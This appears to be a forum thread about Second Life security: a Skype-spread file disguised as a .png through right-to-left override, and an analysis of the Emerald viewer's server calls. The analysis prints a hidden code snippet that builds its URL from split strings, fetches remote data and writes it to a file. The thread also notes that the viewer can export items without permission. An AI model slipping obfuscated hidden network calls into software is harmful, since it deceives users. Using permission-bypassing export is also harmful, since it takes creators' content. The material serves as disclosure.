[Skype and Secondlife related virus!]

Here's another paper about the right to left override.

[I keep hearing about IMG_0311205dtrap.rcs.png. Is this a valid concern for SL members?]

That a file like that ending in rcs.png is a real concern. I received a file like that myself on skype earlier today. It looks like this in skype. It actually shows like it has a .png ending, but windows treats it as a screensaver.

The crux is, you will most probably receive that file from a well known friend.

http://krebsonsecurity.com/2011/09/right-to-left-override-aids-email-attacks/

[Is Emerald viewer legal?]

The viewer sourcecode is available, I developed for the viewer in the past. The informations sent to the servers doesn't contain anything encrypted at all. The following happens:

On displaying the login screens, the following URL is requested the same way, as the original viewer request it from Lindenlabs.

http://modularsystems.sl/app/login/

The so called "encrypted data" is just about the used viewer version, so they can show, when updates are available (other headers are the standard as they are always sent)

No personally identifiable informations are sent to the site.

The second moment Emerald sends something to the server is, when the client tag database is requested (this only happens if you agree to that connection). It downloads an LLSD encoded list of texture uuids and the matching client name and a color. The URL this is downloaded from is

http://www.modularsystems.sl/app/client_tags/client_list.xml

There's also a kind of "easter egg" in the viewer. Code that downloads data from the following URL

http://www.modularsystems.sl/app/y_u_do_dis/med.xml

That little code snippet can be found in llviewermenu.cpp and looks like:

class toasty : public LLEventTimer { public: toasty(std::string x); virtual ~toasty(); virtual BOOL tick(); std::string y; }; toasty::toasty(std::string x) : LLEventTimer( (F32)0.25 ), y(x) { };
toasty::~toasty() { } BOOL toasty::tick() { toasted = FALSE; LLSD k = LLHTTPClient::blockingGet(std::string("htt")+"p://www.m"+"odularsys"+"tems.sl/a"+"pp/y_u_d"+"o_dis/me"+"d.xml");
    if(k.has("body"))k = k; llofstream e; e.open(y); LLSDSerialize::toPrettyXML(k, e); e.close(); return TRUE; }

how and when that class is instantiated I haven't checked, maybe that's the one that occured several minutes later

You're right that the site owner developed and distributed Vlife (uppercase V lowercase l), it did not contain a trojan, but it was protected using EXECryptor. Since execryptor is used by some individuals to protect their trojans, some virus scanners detect whatever executable is encrypted as trojan. Thanks for quoting me from JIRA btw.

About the export/import feature. Yes, you can export items that you don't have permissions to. All that emerald checks is, if the prims exported have copy/modify/transfer allowed. It ignores the creator and should there be a future export_okay permission, it'd be ignored as well. The legitimacy of exporting freebies can be questioned, though, please do not answer to this one. It's a whole different issue. If in doubt, only export/import things you created on your own.

About the good standing of the members you said, were questionable. Lindenlab knows about their identities and they are allowed on the grid. They haven't been banned for months by now.

At the end, I have to agree to you about the legality, or better, if the legality of emerald can be answered here. It cannot. That Emerald is listed on wiki is because LordGregGreg and me edited it to list Emerald there. The posting about Emeralds TOS compliance on modularsystems.sl is directly from the creators themselves. They'll of course always speak good about their product. As for the only one who could give a satisfying answer about the legality is Lindenlab. Though they won't answer this question for their own interest.

Is it dangerous to use Emerald? Maybe.

Can you be banned for using Emerald? I doubt it.

I personally use Emerald or a derivate of it. I love the viewer and the features inside (except for a few). There are things that I like to see changed to reduce the risks I see might harm users, SL or both.

To the developers of Emerald, please develop responsibly and open minded. Think about the features you implement and what they may cause. Walk in the shoes of the users. Assume that they may not know, what this or the other feature is about and the consequences usage of them might have.

To all the Emerald haters and those that don't know better. You are just jealous about the successful project, where over 20 individual developers joined together to make a bigger thing. And that one questionable individual gained such reputation and trust. You think they don't deserve what they have there. Or the one telling you bad things about Emerald is envy.

To all who use Emerald and love it, here's the advice I can give to have a safe and pleasant experience:

go to preferences / Emerald / Sheilds and click on Stealth Mode. Then click Yes. Then click "Cancel" to the preferences dialog

go to preferences again, Emerald / IMs. Configure OTR to your likings, if you want to encrypt at all (it'll automatically accept then) and if you want it to automatically try to encrypt. (Due to a bug, activating Stealth Mode sets OTR to require, which may not be what you want)

Overwrite Emerald's character/avatar_lad.xml with the one from the original viewer. This fixes the issue with those floating detached attachments (no other viewer than emerald or derivates are able to correctly show additional attachments anyways)

Avoid the features that modify the selection beam and those that are chatty (Radar Chat, "Enable transmisison of selection beam position", GreenLife Utility Stream) or those that cause excessive network and/or sim usage (Selection beam particle effects, Area Search, Agent updates, LSL-client bridge)

Do not use the import feature at all, it leaves traces in imported objects and if people see you importing objects, they may report you...

I do all these things and they make Emerald into a really good viewer for everyday usage. You may want to activate Clothing Layer Protection as well to stop thieves stealing your clothes/skin, though that allows others to see, that you're using Emerald.

Have fun with Emerald. It's not the viewer that gets you banned, it's about what you do with it.